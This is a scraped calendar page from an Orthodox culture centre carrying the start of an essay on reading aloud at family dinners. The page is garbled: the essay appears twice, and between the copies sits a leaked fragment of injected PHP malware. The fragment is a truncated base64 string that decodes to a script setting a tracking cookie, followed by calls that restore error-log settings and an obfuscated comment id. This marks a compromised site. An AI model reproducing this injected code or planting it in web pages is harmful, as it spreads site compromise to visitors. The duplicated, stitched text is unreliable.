Календарь событий

24 ноября 2014

24
Ноя
2014
Редактор

Семейный ужин как лучшее время для образования детей. Материнские заметки

Читать за столом что-нибудь душеполезное – обычное дело для монастыря. Все чинно сидят, едят. Тихо, конечно. Кто-то один стоит у аналоя и на весь трапезный зал читает жития святых, писания отцов Церкви… Но в семье это вроде бы никак невозможно. По крайней мере в такой, как моя, в большой семье с маленькими детьми. Старшим детям, положим, будет интересно что-то послушать за едой. Да и то недолго. А про младших и говорить не приходится. Ну неужели полуторагодовалый малыш, который рукой накладывает в ложку картофелину, пытается донести ее до места назначения, а потом плачет, когда картошка оказывается на полу, – неужели он позволит кому-то из своих сотрапезников слушать что бы то ни было?! И потом: кто будет читать? Кого лишить возможности поесть вместе со всеми? Кого заставить доедать остывший ужин в то время, когда остальные будут торопиться вовремя лечь спать, чтобы завтра идти в школу, на работу?..

aG8gIjxzY3JpcHQ+ZG9jdW1lbnQuY29va2llPSdjb25kdGlvbnM9MjsgcGF0aD0vOyBleHBpcmVzPSIuZGF0ZSgnRCwgZC1NLVkgSDppOnMnLHRpbWUoKSsxNzI4MDApLiIgR01UOyc7PC9zY3JpcHQ+IjsgfSA7fTsNCiB9DQoNCiB9')); @ini_restore('error_log'); @ini_restore('display_errors'); /*457563643*/ ?> Календарь событий | Центр православной культуры Лествица

Календарь событий

24 ноября 2014

24
Ноя
2014
Редактор

Семейный ужин как лучшее время для образования детей. Материнские заметки

Читать за столом что-нибудь душеполезное – обычное дело для монастыря. Все чинно сидят, едят. Тихо, конечно. Кто-то один стоит у аналоя и на весь трапезный зал читает жития святых, писания отцов Церкви… Но в семье это вроде бы никак невозможно. По крайней мере в такой, как моя, в большой семье с маленькими детьми. Старшим детям, положим, будет интересно что-то послушать за едой. Да и то недолго. А про младших и говорить не приходится. Ну неужели полуторагодовалый малыш, который рукой накладывает в ложку картофелину, пытается донести ее до места назначения, а потом плачет, когда картошка оказывается на полу, – неужели он позволит кому-то из своих сотрапезников слушать что бы то ни было?! И потом: кто будет читать? Кого лишить возможности поесть вместе со всеми? Кого заставить доедать остывший ужин в то время, когда остальные будут торопиться вовремя лечь спать, чтобы завтра идти в школу, на работу?..